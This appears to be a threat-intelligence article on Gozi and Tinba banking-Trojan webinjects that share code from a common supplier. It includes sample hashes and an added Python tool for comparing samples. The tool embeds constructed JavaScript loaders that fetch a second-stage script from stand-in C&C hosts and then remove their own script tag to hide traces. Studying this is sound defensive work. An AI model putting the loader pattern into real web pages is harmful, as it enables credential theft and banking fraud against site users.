Webinject crafting is a separate profession now. There are people who write webinjects and sell them to fraudsters, who use them to weaponize Trojans. Based on our analysis of several campaigns of Gozi and Tinba, the malware distributors seem to have bought their webinjects from the same webinjects workshop.
Although these are different malware families attacking mostly different financial institutions, their webinjects appear almost identical. The only small differences arise because each family reports to its own fraudster-controlled server and carries fake HTML content customized for its specific banking targets.
The main structure of this webinject version comprises several scripts that will initialize the BOTID, fetch external scripts that include the main fraud functionality, and remove the script element from the DOM to cover its traces.
Figures 1 and 2 show the identical parts of the script and the differences in the additional scripts fetched from the command-and-control (C&C) server. Notice that the path structure on the C&C server gives a hint about the attacked country. In this example, the Tinba external script URL uses a different domain name and carries the geographical target area as the path segment "id" (Indonesia). The Gozi external script URL is also identified by geographical target area, but there it appears as the subfolder name "di" (Indonesia).
Analyzing the external scripts that carry the fraud business logic reveals the same resemblance already seen in the webinject itself (see Figures 3 and 4).
The Gozi injection has customized, fake HTML content for a Polish bank, but other than that, most of the variables and functions bear the same names and the same logic.
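One way to make this comparison mechanically, as an added example that is not F5's code: two constructed loader snippets stand in for the Tinba and Gozi webinjects (the real samples are not reproduced here) and follow the structure described above, a bot id setup, a second-stage script fetched from a C&C path carrying a country marker, and the injected script element detaching itself. The comparison strips string literals so that only author-chosen identifiers are scored, and separately reports the C&C locator and the self-removal pattern; the host names, identifiers and regular expressions are all assumptions of this example.

```python
import re

# Constructed stand-ins for two webinjects (not the real Gozi/Tinba code) with
# the structure the article describes: set up a bot id, fetch a second-stage
# script from a C&C path carrying a country marker, then detach the <script>.
TINBA_LIKE = """
var cfg = { bid: makeBotId() };
function loadStage2() {
  var inj = document.createElement("script");
  inj.src = "https://tinba-c2.invalid/id/inj.js?bid=" + cfg.bid;
  document.head.appendChild(inj); inj.parentNode.removeChild(inj);
}
loadStage2();
"""
# Same workshop template: only the C&C host/path and bank-specific fake HTML differ.
GOZI_LIKE = (TINBA_LIKE.replace("tinba-c2.invalid/id/", "gozi-c2.invalid/di/")
             + 'var fakeForm = "<form id=login>...</form>";\n')

JS_KEYWORDS = {"var", "let", "const", "function", "return", "new", "this", "if", "else"}
DOM_NAMES = {"document", "window", "head", "src", "createElement", "appendChild",
             "removeChild", "parentNode"}

def identifiers(src):
    """Author-chosen names only: strip string literals, drop keywords and DOM API."""
    code = re.sub(r'"[^"]*"|\'[^\']*\'', '""', src)
    return set(re.findall(r"[A-Za-z_$][\w$]*", code)) - JS_KEYWORDS - DOM_NAMES

def jaccard(a, b):
    return len(a & b) / len(a | b) if a | b else 0.0

def c2_locator(src):
    """(host, first path segment) of the fetched script URL, or None."""
    m = re.search(r'''https?://([^/'"\s]+)/([^/'"\s?]+)''', src)
    return (m.group(1), m.group(2)) if m else None

def self_removing_script(src):
    """Does the loader detach the same element it just appended?"""
    return bool(re.search(r"(\w+)\.parentNode\.removeChild\(\1\)", src))

def compare(src_a, src_b):
    ids_a, ids_b = identifiers(src_a), identifiers(src_b)
    return {
        "shared_names": sorted(ids_a & ids_b),
        "only_a": sorted(ids_a - ids_b),
        "only_b": sorted(ids_b - ids_a),
        "name_similarity": jaccard(ids_a, ids_b),
        "c2": (c2_locator(src_a), c2_locator(src_b)),
        "self_removing": (self_removing_script(src_a), self_removing_script(src_b)),
    }
```

Run `compare(TINBA_LIKE, GOZI_LIKE)` to see five shared names against one bank-specific extra, differing C&C hosts with the "id"/"di" markers, and the self-removal pattern present in both.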
We expect the complexity of webinjects to increase, along with their roles in successfully committing malicious transactions. This trend is being closely monitored by our researchers. What remains to be seen is whether the "production" of these webinjects, which use shared rather than custom code, increases the risk that more organizations, and smaller organizations, may be attacked.
Sampled Tinba MD5: a01412b41e1837754be907d6989472e5
Sampled Gozi MD5: e4d8cc25266ae39a5e5e87c7048f15f3
About F5 Labs
F5 Labs combines the application threat intelligence data we collect with the expertise of our security researchers to provide actionable, global intelligence on current cyber threats—and to identify future trends. We look at everything from threat actors, to the nature and source of attacks, to post-attack analysis of significant incidents to create a comprehensive view of the threat landscape. From the newest malware variants to zero-day exploits and attack trends, F5 Labs is where you’ll find the latest insights from F5’s threat intelligence team.
MODIFIED: Jul 06, 2017